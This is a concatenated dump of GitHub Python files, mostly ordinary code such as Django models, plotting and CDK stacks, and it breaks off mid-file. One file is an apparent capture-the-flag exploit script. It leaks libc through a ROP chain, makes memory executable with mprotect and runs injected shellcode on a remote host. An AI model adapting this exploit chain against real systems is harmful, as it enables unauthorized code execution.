] | permissive | foamliu/Complex-Analysis | daef349ddf5ad8f8037fb026d4eab35d4a3192c8 | 6389c69dad680015cb7fa5fe9789793638ccddd0 | refs/heads/master | 2020-05-09T21:00:24.454517 | 2019-05-28T09:37:17 | 2019-05-28T09:37:17 | 181,427,148 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 601 | py | import matplotlib.pyplot as plt
import numpy as np

# Rectangular sample grid over part of the upper half-plane:
# Re(z0) in [-1, 1], Im(z0) in [0, 3].
re_axis = np.linspace(-1, 1, 200)
im_axis = np.linspace(0, 3, 360)
grid_re, grid_im = np.meshgrid(re_axis, im_axis)
halfplane = grid_re + 1j * grid_im

# Moebius transform w = (i*z + 1) / (z + i), which sends the upper
# half-plane onto the unit (Poincare) disk.
disk = (1j * halfplane + 1) / (halfplane + 1j)

# Colour each sample by the angle of its original coordinates so the
# mapping is easy to follow visually.
hue = np.arctan2(grid_re, grid_im)

plt.figure(figsize=(14, 6))

plt.subplot(1, 2, 1)
plt.scatter(grid_re, grid_im, c=hue, s=10, lw=0, cmap='hsv')
plt.title('real points')
plt.xlabel('Re(z)')
plt.ylabel('Im(z)')
plt.axis('equal')
plt.grid(True)

plt.subplot(1, 2, 2)
plt.scatter(np.real(disk), np.imag(disk), c=hue, s=10, lw=0, cmap='hsv')
plt.title('poincare disk')
plt.xlabel('Re(z)')
plt.ylabel('Im(z)')
plt.axis('equal')
plt.grid(True)

plt.show()
| [
"foamliu@yeah.net"
] | foamliu@yeah.net |
fd8db4fd2ea2cced67e397b5060fe198e20fc74a | 97326c2dcdcc9ef8232d99e4445a1cc6a37aec22 | /docs/conditionals/example-6.py | bfb84e4bbe26d99c2358aba5838785b36a1e70e8 | [] | no_license | Barnsa/programming-resources | 8e1c043106089f10553eb8f303486905c7215c77 | 1ad0483a0f964f36fe65fda2d614c2782e0f1ed1 | refs/heads/master | 2022-11-17T17:06:56.736072 | 2020-07-21T13:06:52 | 2020-07-21T13:06:52 | 266,988,442 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 478 | py | # example-6.py
# A tour of Python's less common literal notations.
string_literals = "string"        # plain text
integer_literals = 12             # base-10 int
octal_literals = 0o11             # 9 in decimal
hexadecimal_literals = 0x123      # 291 in decimal
set_literals = {2, 4, 7}          # set literal
complex_literals = 12J            # purely imaginary complex number (12j)
unicode_literals = u"string"      # the 'u' prefix is a no-op in Python 3
byte_code_literals = b"string"    # bytes, not str

# Collect everything and print in the same order as declared above.
examples = (
    string_literals,
    integer_literals,
    octal_literals,
    hexadecimal_literals,
    set_literals,
    complex_literals,
    unicode_literals,
    byte_code_literals,
)
print(*examples)
"barnsa@uni.coventry.ac.uk"
] | barnsa@uni.coventry.ac.uk |
fcd354527ad7264d9770ddd8aa6d4c00fc4838c0 | 3fcd2c184abaa9bef5f4a916fbf0e9587da06346 | /IO/Asynchronous/Asyncio/aio_http.py | 7334a8e74fea9ff2ad791431ca5cf882865cab4a | [] | no_license | chinitacode/Python_Learning | 865ff42722e256776ae91d744b779fa476e23f45 | 49aa02367e3097aca107b70dab43b5f60a67ef9f | refs/heads/master | 2020-06-29T01:05:39.331297 | 2020-03-21T14:29:51 | 2020-03-21T14:29:51 | 200,393,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 509 | py | import asyncio,aiohttp
async def fetch_async(url):
    """Print *url*, fetch it with aiohttp, and print the decoded body."""
    print(url)
    async with aiohttp.request("GET", url) as resp:
        # Decode the body as UTF-8 text; for binary payloads such as images
        # that must not be decoded, use ``await resp.read()`` instead.
        body = await resp.text(encoding="utf-8")
        print(body)


# Fetch both pages concurrently on a single event loop.
crawl_tasks = [fetch_async('http://www.baidu.com/'), fetch_async('http://www.chouti.com/')]
loop = asyncio.get_event_loop()
results = loop.run_until_complete(asyncio.gather(*crawl_tasks))
loop.close()
| [
"ziyu_zhou_victoria@163.com"
] | ziyu_zhou_victoria@163.com |
c841438efbd14ab47aef4d8d1813c0b63f7c73b0 | 3546dd5dbcffc8509440c820faa7cf28080c5df7 | /python35/Lib/site-packages/win32comext/axscript/client/pydumper.py | a4a3a5941321bfaad120bfa5bedbefa34bfa6bae | [
"Apache-2.0",
"MIT",
"BSD-3-Clause",
"LGPL-2.1-only"
] | permissive | Matchoc/python_env | 55ad609c8270cc6148eda22d37f36709d73b3652 | 859d84d1717a265a4085ad29706b12c19c62d36f | refs/heads/master | 2022-02-13T11:05:51.825544 | 2020-06-05T02:42:08 | 2020-06-05T02:42:08 | 75,793,921 | 0 | 1 | Apache-2.0 | 2018-12-14T07:30:28 | 2016-12-07T03:06:13 | Python | UTF-8 | Python | false | false | 2,204 | py | # pydumper.py
#
# This is being worked on - it does not yet work at all, in ay way
# shape or form :-)
#
# A new script engine, derived from the standard scripting engine,
# which dumps information.
# This generally can be used to grab all sorts of useful details about
# an engine - expose bugs in it or Python, dump the object model, etc.
# As it is derived from the standard engine, it fully supports Python
# as a scripting language - meaning the dumps produced can be quite dynamic,
# and based on the script code you execute.
from . import pyscript
from win32com.axscript import axscript
from .pyscript import RaiseAssert, trace, Exception, SCRIPTTEXT_FORCEEXECUTION
PyDump_CLSID = '{ac527e60-c693-11d0-9c25-00aa00125a98}'
class AXScriptAttribute(pyscript.AXScriptAttribute):
    # Placeholder subclass: currently identical to the base attribute class.
    pass

class NamedScriptAttribute(pyscript.NamedScriptAttribute):
    # Placeholder subclass: currently identical to the base class.
    pass

class PyScript(pyscript.PyScript):
    # The dumping engine currently adds no behaviour over the standard
    # Python scripting engine; hooks can be overridden here later.
    pass
def Register():
    """Register the PyDump ActiveX scripting engine with Windows/COM.

    Pass ``-d`` on the command line to register with the Win32 trace
    dispatcher so engine activity is logged.
    """
    import sys
    if '-d' in sys.argv:
        dispatcher = "DispatcherWin32trace"
        debug_desc = " ("+dispatcher+")"
        debug_option = "Yes"
    else:
        dispatcher = None
        debug_desc = ""
        debug_option = ""
    categories = [axscript.CATID_ActiveScript,axscript.CATID_ActiveScriptParse]
    clsid = PyDump_CLSID
    lcid = 0x0409 # // english
    policy = None # "win32com.axscript.client.axspolicy.AXScriptPolicy"
    print("Registering COM server%s..." % debug_desc)
    # BUG FIX: the module never bound the name ``win32com`` (only
    # ``from win32com... import`` forms were used), so the
    # ``win32com.server.register._set_string`` calls below raised NameError.
    import win32com.server.register
    from win32com.server.register import RegisterServer
    languageName = "PyDump"
    verProgId = "Python.Dumper.1"
    RegisterServer(clsid = clsid, pythonInstString = "win32com.axscript.client.pyscript.PyDumper",
                   className = "Python Debugging/Dumping ActiveX Scripting Engine",
                   progID = languageName, verProgID = verProgId,
                   catids = categories,
                   policy=policy, dispatcher = dispatcher)
    # NOTE(review): ``CreateRegKey`` is still not defined or imported anywhere
    # in this module and will raise NameError when reached; the correct
    # registry helper needs to be wired in before this script is usable.
    CreateRegKey(languageName + "\\OLEScript")
    # Basic Registration for wsh.
    win32com.server.register._set_string(".pysDump", "pysDumpFile")
    win32com.server.register._set_string("pysDumpFile\\ScriptEngine", languageName)
    print("Dumping Server registered.")
if __name__=='__main__':
    # Script entry point: register the engine when run directly.
    Register()
| [
"matchoc@hotmail.com"
] | matchoc@hotmail.com |
078cbf9ece2db7c8b5f1892f5fcbb5f78c300ffa | fe8fa8bf7273a7894f91f5027880164358047e85 | /shop/models.py | b673dfc67bb0d074ce0066def6e818b5590979ea | [
"MIT"
] | permissive | urosjevremovic/online-shop | 7935be8947ebaa4f44c28dae6ed0b895c89fcd0e | 39328da7438852206a355df5a4ae6c8aa90c186b | refs/heads/master | 2020-03-23T16:42:25.248301 | 2018-07-25T15:07:35 | 2018-07-25T15:07:35 | 141,823,951 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,363 | py | from django.db import models
from django.urls import reverse
class Category(models.Model):
    """A product category; ``slug`` is unique and used in category URLs."""
    name = models.CharField(max_length=120, db_index=True)
    slug = models.CharField(max_length=120, unique=True)

    class Meta:
        ordering = ('-name', )
        verbose_name = 'category'
        verbose_name_plural = 'categories'

    def __str__(self):
        return self.name

    def get_absolute_url(self):
        # Link to the product listing filtered by this category.
        return reverse('shop:product_list_by_category', args=[self.slug])
class Product(models.Model):
    """A catalogue product belonging to one :class:`Category`."""
    category = models.ForeignKey(Category, related_name='product', on_delete=models.CASCADE)
    name = models.CharField(max_length=200, db_index=True)
    slug = models.CharField(max_length=200, db_index=True)
    image = models.ImageField(upload_to='product/%Y/%m/%d', blank=True)
    description = models.TextField(blank=True)
    price = models.DecimalField(max_digits=10, decimal_places=2)
    stock = models.IntegerField(default=20)
    available = models.BooleanField(default=True)
    created = models.DateTimeField(auto_now_add=True)
    updated = models.DateTimeField(auto_now=True)

    class Meta:
        ordering = ('-name', )
        # Detail pages are addressed by (id, slug), so index them together.
        index_together = (('id', 'slug'), )

    def __str__(self):
        return self.name

    def get_absolute_url(self):
        return reverse('shop:product_detail', args=[self.id, self.slug])
| [
"jevremovic.uros91@gmail.com"
] | jevremovic.uros91@gmail.com |
eb0d0e43a90927231bac66479c5d230cec59cd25 | 29e2afe487acefdc17ae4b16def495632d479be3 | /morpfw/crud/__init__.py | d38eadc21aafd253567055f77b655f7f0266a68c | [] | no_license | brainysmurf/morpfw | fd2a40b660bef00b9cc0a142cbfdcb8d37620f2b | a8d5e3fa57a8d66b61840f113ba54f6c1fcf60d0 | refs/heads/master | 2020-04-10T08:26:20.123425 | 2018-12-07T09:59:43 | 2018-12-07T09:59:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,510 | py | import morepath
from .app import App
from . import subscribers
from .app import Session
import argparse
import yaml
import sqlalchemy
import os
from .model import Collection, Model
from .rulesadapter import Adapter
from .schema import Schema
from .model import StateMachine
from .util import resolve_model
from .app import App
from .storage.sqlstorage import SQLStorage
from zope.sqlalchemy import register as register_session
def run():
    """CLI entry point: load a YAML settings file and serve the app.

    The settings path defaults to ``settings.yml`` and can be overridden
    with ``-s/--settings``.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-s', '--settings', default='settings.yml')
    args = parser.parse_args()
    with open(args.settings) as cf:
        # SECURITY/DEPRECATION FIX: bare ``yaml.load`` can instantiate
        # arbitrary Python objects from the settings file and requires an
        # explicit Loader in PyYAML >= 5.1; ``safe_load`` parses plain data
        # only, which is all a settings file needs.
        settings = yaml.safe_load(cf)
    application = create_app(App, settings)
    # start app
    morepath.run(application)
def create_app(app, settings, sqlalchemy_session=Session,
               sqlalchemy_bases=None):
    """Configure and instantiate a Morepath application.

    :param app: the Morepath app class to configure
    :param settings: settings mapping; an optional ``sqlalchemy`` section
        with a ``dburi`` key (which may contain a ``%(here)s`` placeholder
        for the current working directory) enables database setup
    :param sqlalchemy_session: scoped session to bind to the engine
    :param sqlalchemy_bases: declarative bases whose tables are created
        once the app is committed
    :return: the instantiated application
    """
    sqlalchemy_bases = sqlalchemy_bases or []
    register_session(sqlalchemy_session)
    # initialize SQLAlchemy
    if 'sqlalchemy' in settings:
        cwd = os.getcwd()
        engine = sqlalchemy.create_engine(
            settings['sqlalchemy']['dburi'] % {'here': cwd})
        sqlalchemy_session.configure(bind=engine)
    # initialize app: settings must be applied before the configuration
    # commit, and autoscan picks up all installed Morepath packages.
    app.init_settings(settings)
    morepath.commit(app)
    morepath.autoscan()
    app.commit()
    application = app()
    # create tables (only reached with a valid engine, since both branches
    # are guarded by the same 'sqlalchemy' settings key)
    if 'sqlalchemy' in settings:
        for base in sqlalchemy_bases:
            base.metadata.create_all(engine)
    return application
if __name__ == '__main__':
    # Allow running this module directly as a CLI entry point.
    run()
| [
"kagesenshi.87@gmail.com"
] | kagesenshi.87@gmail.com |
dde7bfd72a9c08bfffad33758d1137ddd7fa93d0 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_53/501.py | a8f69f0a69a63542706fc8e3cfa8c19f65f8686a | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 286 | py | # -*- coding: utf-8 -*-
import sys
fin = sys.stdin
T = int(fin.readline())
for case in range(1,T+1):
(N,k) = map(int, fin.readline().split())
m = pow(2,N)
#print m
if (k+1) % m == 0:
print "Case #%d: ON" % (case)
else:
print "Case #%d: OFF" % (case)
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
41106cde601cc1c35e636198ff7b8dd1a03de755 | 09f8a3825c5109a6cec94ae34ea17d9ace66f381 | /cohesity_management_sdk/models/couchbase_cluster.py | bfa8f347c5dc05f02dbd954e2bd179bc7848972b | [
"Apache-2.0"
] | permissive | cohesity/management-sdk-python | 103ee07b2f047da69d7b1edfae39d218295d1747 | e4973dfeb836266904d0369ea845513c7acf261e | refs/heads/master | 2023-08-04T06:30:37.551358 | 2023-07-19T12:02:12 | 2023-07-19T12:02:12 | 134,367,879 | 24 | 20 | Apache-2.0 | 2023-08-31T04:37:28 | 2018-05-22T06:04:19 | Python | UTF-8 | Python | false | false | 1,325 | py | # -*- coding: utf-8 -*-
# Copyright 2023 Cohesity Inc.
class CouchbaseCluster(object):
    """Model of a Couchbase cluster as exchanged with the Cohesity API.

    Attributes:
        seeds (list of string): Seeds of this Couchbase Cluster.
    """

    # Maps Python attribute names to the JSON property names used by the API.
    _names = {
        "seeds": 'seeds',
    }

    def __init__(self, seeds=None):
        """Initialize a CouchbaseCluster with the given seed list."""
        self.seeds = seeds

    @classmethod
    def from_dictionary(cls, dictionary):
        """Build a CouchbaseCluster from a deserialized API response.

        Args:
            dictionary (dict): Response body whose keys match the API
                property names declared in ``_names``.

        Returns:
            CouchbaseCluster or None: ``None`` when *dictionary* is ``None``.
        """
        if dictionary is None:
            return None
        return cls(dictionary.get("seeds"))
"naveena.maplelabs@cohesity.com"
] | naveena.maplelabs@cohesity.com |
c7c44980d93edb211bcc3294467a393395be5804 | f4912e5b302f9a9fe013a7ddefe18a599fd1715d | /app_stacks/vpc_stack.py | a595a79091241b7a77efb093e5fcf86043fcc5b0 | [] | no_license | miztiik/xray-lambda-profiler | 5c49d9e4ffcd116fc76f9a7cf5c4c7e0ea9cc45a | 5f7add49d832899e01dd54b72c1478efa9f6853f | refs/heads/master | 2021-04-11T17:07:45.722949 | 2020-08-30T13:06:14 | 2020-08-30T13:06:14 | 249,039,624 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,634 | py | from aws_cdk import aws_ec2 as _ec2
from aws_cdk import core
class global_args:
    '''
    Helper to define global statics
    '''
    OWNER = 'MystiqueAutomation'
    ENVIRONMENT = 'production'
    REPO_NAME = 'xray-lambda-profiler'
    # Link back to the source repository; surfaced via a CfnOutput.
    SOURCE_INFO = f'https://github.com/miztiik/{REPO_NAME}'
    VERSION = '2020_03_21'
class VpcStack(core.Stack):
    """CDK stack that either looks up an existing VPC by name or provisions
    a new one with public and isolated subnets and no NAT gateways."""

    def __init__(self, scope: core.Construct, id: str, from_vpc_name=None, ** kwargs) -> None:
        super().__init__(scope, id, **kwargs)

        if from_vpc_name is not None:
            # Reuse an existing VPC rather than provisioning a new one.
            self.vpc = _ec2.Vpc.from_lookup(
                self, "vpc",
                vpc_name=from_vpc_name
            )
        else:
            self.vpc = _ec2.Vpc(
                self,
                "miztVpc",
                cidr="10.10.0.0/16",
                max_azs=2,
                # No NAT gateways: isolated subnets get no internet egress.
                nat_gateways=0,
                subnet_configuration=[
                    _ec2.SubnetConfiguration(
                        name="public", cidr_mask=24, subnet_type=_ec2.SubnetType.PUBLIC
                    ),
                    # _ec2.SubnetConfiguration(
                    #     name="app", cidr_mask=24, subnet_type=_ec2.SubnetType.PRIVATE
                    # ),
                    _ec2.SubnetConfiguration(
                        name="db", cidr_mask=24, subnet_type=_ec2.SubnetType.ISOLATED
                    )
                ]
            )

        # Advertise where this automation came from in the stack outputs.
        output_0 = core.CfnOutput(
            self,
            "AutomationFrom",
            value=f"{global_args.SOURCE_INFO}",
            description="To know more about this automation stack, check out our github page."
        )
| [
"13oct08@quantumfoam.uni.cc"
] | 13oct08@quantumfoam.uni.cc |
class Plant(object):
    """Subject in a simple observer pattern: keeps a list of observers and
    broadcasts state changes to them."""

    def __init__(self):
        self._observers = []

    def attach(self, observer):
        """Register *observer* unless it is already registered."""
        if observer not in self._observers:
            self._observers.append(observer)

    def notify(self, modifier=None):
        """Call ``update(self)`` on every observer except *modifier*."""
        for watcher in self._observers:
            if watcher != modifier:
                watcher.update(self)


class Organ(Plant):
    """A plant organ whose property writes broadcast to attached observers."""

    def __init__(self, name=''):
        Plant.__init__(self)
        self.name = name
        self._carbon = 10
        self._length = 10
        self._photo = 3

    def _set_and_notify(self, attr, value):
        # Shared setter plumbing: store the value, then fan out to observers.
        setattr(self, attr, value)
        self.notify()

    @property
    def carbon(self):
        return self._carbon

    @carbon.setter
    def carbon(self, value):
        self._set_and_notify('_carbon', value)

    @property
    def length(self):
        return self._length

    @length.setter
    def length(self, value):
        self._set_and_notify('_length', value)

    @property
    def photo(self):
        return self._photo

    @photo.setter
    def photo(self, value):
        self._set_and_notify('_photo', value)
class CarbView:
    """Observer that prints a plant's carbon, length, and photo readings."""

    def __init__(self, name=''):
        self.name = name

    def update(self, plant):
        """Report *plant*'s current state to stdout."""
        for attr in ('carbon', 'length', 'photo'):
            print('%s has %d %s' % (plant.name, getattr(plant, attr), attr))
        print(plant.length * plant.photo)
| [
"rjmarkelz@ucdavis.edu"
] | rjmarkelz@ucdavis.edu |
cf95d8797fffba43060c2f90f9dc5f76f00f38e7 | b07a69b7a82f4bd22501908501b4b6ff3c1f2a94 | /week15_and_onwards/MySite/mysite/mysite/views.py | 16156c186c2c57064ddb40e566f3e00ad26b857f | [] | no_license | PetosPy/hackbulgaria_python | 8c1103ceefc4f832c42996a86fb351bfc951797c | d7212f35cd448e55009141bd6e42b55f7f05779b | refs/heads/master | 2023-02-28T16:40:22.828545 | 2017-02-15T15:06:28 | 2017-02-15T15:06:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,694 | py | from math import factorial
from django.shortcuts import render, redirect
from django.http import HttpRequest, HttpResponse
from mysite.utils.rle_compressor import compress, decompress
from mysite.utils.calculator import get_nth_fibonacci_numbers, get_nth_prime_numbers, gen_primes
def get_index(request):
    """Render the home page, exposing the whole session dict to the template."""
    return render(request, 'index.html', request.session)
# @/calculateNFactorial
def calc_n_factorial(request: HttpRequest):
    """Compute n! for the posted ``n_fac`` value, store it in the session,
    and redirect back to the index page.

    On bad input an error message is stored in the session instead; note
    that ``factorial()`` also raises ValueError for negative integers, which
    lands in the same error branch as non-numeric input.
    """
    n = request.POST.get('n_fac', '')
    try:
        n = int(n)
        request.session['wanted_n_fac'] = n
        request.session['n_factorial'] = factorial(n)
    except ValueError:
        request.session['error_msg'] = 'The input must be a valid integer!'
    # FIX: make the redirect unconditional so the success path also returns
    # an HttpResponse (Django errors out when a view returns None); this
    # matches the structure of every sibling view in this module.
    return redirect('index')
# @/calculateNthFibonacci
def calc_nth_fibonacci_numbers(request: HttpRequest):
    """Store the first n Fibonacci numbers in the session, then redirect home."""
    raw = request.POST.get('n_fib', '')
    try:
        n = int(raw)
        if n <= 0:
            request.session['error_msg'] = 'The input must be a positive integer!'
        else:
            request.session['wanted_n_fibonaccis'] = n
            request.session['fibonaccis'] = get_nth_fibonacci_numbers(n)
    except ValueError:
        request.session['error_msg'] = 'The input must be a valid integer!'
    return redirect('index')
# @/calculateNthPrimes
def calc_nth_primes(request: HttpResponse):
    """Store the first n primes (1 <= n <= 1000) in the session, then redirect."""
    raw = request.POST.get('n_primes', '')
    try:
        n = int(raw)
        if not 1 <= n <= 1000:
            request.session['error_msg'] = 'The input must be between 1 and 1000!'
        else:
            request.session['wanted_n_primes'] = n
            request.session['primes'] = get_nth_prime_numbers(n)
    except ValueError:
        request.session['error_msg'] = 'The input must be a valid integer!'
    return redirect('index')
# @/encodeRL
def encode_rl(request: HttpResponse):
    """Run-length encode the posted string and store the result in the session."""
    text = request.POST.get('str_to_encode', '')
    try:
        packed = compress(text)
    except ValueError as err:
        # compress() reports invalid input via ValueError; surface it as-is.
        request.session['error_msg'] = str(err)
    else:
        request.session['wanted_enc_str'] = text
        request.session['encoded_str'] = packed
    return redirect('index')
# @/decodeRL
def decode_rl(request: HttpResponse):
    """Run-length decode the posted string and store the result in the session."""
    packed = request.POST.get('str_to_decode', '')
    try:
        text = decompress(packed)
    except ValueError as err:
        # decompress() reports malformed input via ValueError; surface it as-is.
        request.session['error_msg'] = str(err)
    else:
        request.session['wanted_dec_str'] = packed
        request.session['decoded_str'] = text
    return redirect('index')
| [
"familyguyuser192@windowslive.com"
] | familyguyuser192@windowslive.com |
8c61aacae9721743fc2841b847755e4a17fce0e8 | fbde0e2a0c93193949db891b6633a5f61ad9f61b | /backend/home/migrations/0001_load_initial_data.py | 99c69f7d511bef2f5fc5e145ed104df74edc71db | [] | no_license | crowdbotics-apps/test-26691 | 7198419c0a613e6702c71cb568ce3bbf737d33aa | 4a6756c674919dd695b059594726f2093627f0f8 | refs/heads/master | 2023-04-20T17:56:38.407147 | 2021-05-14T12:02:01 | 2021-05-14T12:02:01 | 367,349,252 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 526 | py | from django.db import migrations
def create_site(apps, schema_editor):
    """Data migration: point the default Site (pk=1) at the app's domain."""
    Site = apps.get_model("sites", "Site")
    custom_domain = "test-26691.botics.co"
    site_params = {
        "name": "test",
    }
    if custom_domain:
        site_params["domain"] = custom_domain
    Site.objects.update_or_create(defaults=site_params, id=1)


class Migration(migrations.Migration):
    # Must run after the sites framework's own migrations have created
    # the Site table.
    dependencies = [
        ("sites", "0002_alter_domain_unique"),
    ]

    operations = [
        migrations.RunPython(create_site),
    ]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
014cf8b22ad535325e225718a87d99269363befe | d51b4c766661af65b4ee6e7c30f8cb4bdd8603e3 | /python/algorithm/leetcode/49.py | d9f5c2be72952c7ae5dda1bf600f8c4d534d1acc | [] | no_license | yanxurui/keepcoding | 3e988c76b123d55b32cf7cc35fbffb12c4ccb095 | d6b9f07e2d1437681fa77fee0687ea9b83cab135 | refs/heads/master | 2021-01-24T09:01:41.306597 | 2020-05-21T05:36:04 | 2020-05-21T05:36:04 | 93,400,267 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 961 | py | from collections import defaultdict
class Solution(object):
    """LeetCode 49: Group Anagrams."""

    def groupAnagrams(self, strs):
        """Group words that are anagrams of each other.

        :type strs: List[str]
        :rtype: List[List[str]]
        """
        # Anagrams share the same multiset of letters, so the sorted word is
        # a canonical key; dict insertion order keeps the groups in
        # first-seen order, matching the defaultdict-based original.
        buckets = {}
        for word in strs:
            buckets.setdefault(''.join(sorted(word)), []).append(word)
        return list(buckets.values())
if __name__ == '__main__':
    # Ad-hoc test driver; ``testfunc`` is a local helper module.
    from testfunc import test

    def sort_nest(L):
        # Recursively sort nested lists so comparison is order-insensitive.
        for i in range(len(L)):
            if isinstance(L[i], list):
                L[i] = sort_nest(L[i])
        return sorted(L)

    def compare(a, b):
        '''compare 2 unordered nested list
        '''
        return len(a) == len(b) and sort_nest(a) == sort_nest(b)

    test_data = [
        (
            ["eat", "tea", "tan", "ate", "nat", "bat"],
            [
                ["ate","eat","tea"],
                ["nat","tan"],
                ["bat"]
            ]
        )
    ]
    test(Solution().groupAnagrams, test_data, compare=compare)
| [
"617080352@qq.com"
] | 617080352@qq.com |
51b676bf10693d8682cd739f5ef4b22908e3fe8a | a140b1c2cfcc4d9fe7d4a9fcd51f86bf8d89e41c | /2020.12.11-ASIS_CTF_Finals_2020/babyauth/v00-shellcode.py | 050b95f05ac57989f98ded6682c22009c8eb7789 | [] | no_license | xcode2010/ctf | 6f0e6f76e7cdbe44842576ec49dbbffe0de91a49 | 2c121f1e1171ff0f42a4edfb7a17261cc673adb5 | refs/heads/master | 2023-03-28T07:34:33.695719 | 2021-03-21T17:38:55 | 2021-03-21T18:23:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,121 | py | #!/usr/bin/env python3
from pwn import *
# Gadget, GOT, and helper-function addresses taken from the target binary,
# plus libc offsets.  NOTE(review): all values are build-specific and must
# be re-derived if the challenge binary or its libc changes.
PERCENT_S_NEWLINE = 0x4019c8      # address of a "%s\n"-style format string
POP_RSI_RET = 0x4017fa
POP_RDI_RET = 0x4019a3
PRINTF_CHK_GOT = 0x603090         # GOT slot leaked to compute the libc base
RET = 0x401545
USERNAME_READER = 0x4014c0        # function that re-reads the username
PRINTF_CHK_LIBC = 0x131040        # offset of __printf_chk inside libc
MPROTECT_LIBC = 0x11bb00          # offset of mprotect inside libc
WORK_PAGE = 0x603000              # page made RWX for the shellcode
WORK_ADDR = 0x603150              # where stage 3 is read to and executed
WORK_SIZE = 0xeb0
PAGE_SIZE = 0x1000
POP_RSP_RET = 0x401063
MOV_RDI_R12_CALL_RBP = 0x40183c
POP_RBP_RET = 0x400f08
READ_LIBC = 0x111130              # offset of read inside libc

context.arch = 'amd64'

# Stage-3 shellcode: write(1, "hello from asm\n"...) via a raw syscall,
# proving code execution in the hijacked process.
STAGE3 = asm(r'''
mov rax, 1
mov rdi, 1
lea rsi, [.str + rip]
mov rdx, .str_end - .str
syscall
.str:
.asciz "hello from asm\n"
.str_end:
''')
def connect():
    """Open a pwntools tube to the target: a local ``./server.py`` process
    when run with ``LOCAL=1``, otherwise the remote challenge service."""
    if args.LOCAL:
        return process(['./server.py'])
    else:
        return remote('69.90.132.134', 3317)
def scanf_ok(x):
    """Return True if *x* contains none of the bytes that scanf's ``%s``
    treats as whitespace, so the whole payload survives a single read.

    See https://reverseengineering.stackexchange.com/a/10596
    """
    scanf_whitespace = (b'\x09', b'\x0a', b'\x0b', b'\x0c', b'\x0d', b'\x20')
    return all(sep not in x for sep in scanf_whitespace)
def send_stage1(tube):
    """Send the first ROP payload and return the computed libc base address.

    The chain calls ``__printf_chk(1, "%s\\n", &GOT[__printf_chk])``, which
    prints the runtime address stored in the GOT slot, then restarts the
    username reader so a second payload can be sent.
    """
    tube.recvuntil(b'Username: ')
    # The saved return address sits at offset 0x38 past the username buffer.
    payload = flat({
        0: b'admin\0',
        0x38: b''.join((
            struct.pack('<QQ', POP_RDI_RET, 1),
            struct.pack('<QQ', POP_RSI_RET, PERCENT_S_NEWLINE),
            # pop rdx; mov eax, 1; pop rbx; pop rbp; retn
            struct.pack('<QQQQ', 0x400e8f, PRINTF_CHK_GOT, 0, 0),
            # call ___printf_chk; pop rdx; mov eax, 1; pop rbx; pop rbp; retn
            struct.pack('<QQQQ', 0x400e8a, 0, 0, 0),
            # it just so happens that r12 == IPC *, so we can restart
            struct.pack('<QQ', POP_RBP_RET, USERNAME_READER),
            struct.pack('<Q', MOV_RDI_R12_CALL_RBP),
        )),
    })
    # The payload goes through a scanf-style read: no whitespace bytes allowed.
    assert scanf_ok(payload), payload.hex()
    # input('stage1')
    tube.sendline(payload)
    # The leak arrives as 6 raw bytes (a canonical userspace address).
    printf_chk, = struct.unpack('<Q', tube.recvn(6).ljust(8, b'\x00'))
    libc = printf_chk - PRINTF_CHK_LIBC
    print(f'libc: 0x{libc:x}')
    # libc bases are page-aligned; sanity-check the leak before using it.
    assert libc & 0xfff == 0
    return libc
def send_stage2(tube, libc):
    """Send the second ROP payload: make the work page executable and pivot
    into freshly-read shellcode.

    The chain calls ``mprotect(WORK_PAGE, PAGE_SIZE, 7)``, then
    ``read(0, WORK_ADDR, WORK_SIZE)`` to pull stage 3 from the tube, and
    finally returns into WORK_ADDR to execute it.
    """
    tube.recvuntil(b'Username: ')
    payload = flat({
        0: b'admin\0',
        0x38: b''.join((
            struct.pack('<QQ', POP_RDI_RET, WORK_PAGE),
            struct.pack('<QQ', POP_RSI_RET, PAGE_SIZE),
            # pop rdx; mov eax, 1; pop rbx; pop rbp; retn
            struct.pack('<QQQQ', 0x400e8f, 0x7, 0, 0),
            struct.pack('<Q', libc + MPROTECT_LIBC),
            struct.pack('<QQ', POP_RDI_RET, 0),
            struct.pack('<QQ', POP_RSI_RET, WORK_ADDR),
            # pop rdx; mov eax, 1; pop rbx; pop rbp; retn
            struct.pack('<QQQQ', 0x400e8f, WORK_SIZE, 0, 0),
            struct.pack('<Q', RET),
            struct.pack('<Q', libc + READ_LIBC),
            struct.pack('<Q', RET),
            struct.pack('<Q', WORK_ADDR),
        ))
    })
    assert scanf_ok(payload)
    # input('stage2')
    tube.sendline(payload)
def pwn_once(tube):
    """Run the full exploit against an open tube: leak libc, stage the RWX
    page and read loop, then deliver the stage-3 shellcode."""
    libc = send_stage1(tube)
    send_stage2(tube, libc)
    # input('stage3')
    tube.send(STAGE3)
def main():
    """Connect, exploit, and hand the tube over for interactive use."""
    with connect() as tube:
        pwn_once(tube)
        tube.interactive()


if __name__ == '__main__':
    main()
| [
"mephi42@gmail.com"
] | mephi42@gmail.com |
60bd221d9a7201ed61317b388cf986a9fd6e682d | 8eeb9db7f4bc986a8b24c09b8af1ce10dd97689e | /posts/models.py | 4f07bafa70e93300ec6e92397229f9351b72512c | [] | no_license | jotasic/wecode_wanted | e21a400b6582ae8a5b5af7f8242f67575dc91b74 | e291513d8e6353ad6318d0894cf8f78d07d084a7 | refs/heads/main | 2023-08-29T01:36:44.595014 | 2021-10-22T02:39:20 | 2021-10-22T02:39:20 | 418,725,436 | 0 | 0 | null | 2021-10-22T02:45:28 | 2021-10-19T01:20:52 | Python | UTF-8 | Python | false | false | 430 | py | from django.db import models
from django.conf import settings
class Post(models.Model):
